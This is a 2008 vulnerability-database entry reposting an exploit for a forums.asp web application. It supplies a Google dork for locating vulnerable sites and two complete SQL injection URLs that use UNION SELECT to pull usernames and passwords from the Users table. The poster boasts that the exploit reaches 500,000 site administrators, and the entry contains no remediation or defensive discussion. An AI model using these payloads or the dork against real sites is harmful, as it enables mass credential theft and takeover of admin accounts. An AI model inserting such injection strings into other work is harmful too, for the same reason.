all forums.asp hack

2008-02-15T00:00:00
ID SECURITYVULNS:DOC:19123
Type securityvulns
Reporter Securityvulns
Modified 2008-02-15T00:00:00

Description

this exploit have 500.000 site admin

forums.asp hack (content.asp?contenttype) SQL Injection

###################################################################

AUTHOR : S@BUN

HOME : http://www.hackturkiye.com/

DORKS 2 : allinurl: "content.asp?contenttype"

EXPLOIT 1:

forums.asp?keywords=S@BUN&do_search=1&sortby=users.user_name+UNION+SELECT+1,2,3,4,5,user_name,password,8,9,10,11,12,13,14+FROM+Users

EXPLOIT 2:

forums.asp?keywords=S@BUN&do_search=1&sortby= users.user_name+UNION+SELECT+1,2,3,4,5,user_name,password,8,9,10,11,12,13,14,15+FROM+Users

S@BUN www.hackturkiye.com S@BUN

S@BUN GOOD LUCKY S@BUN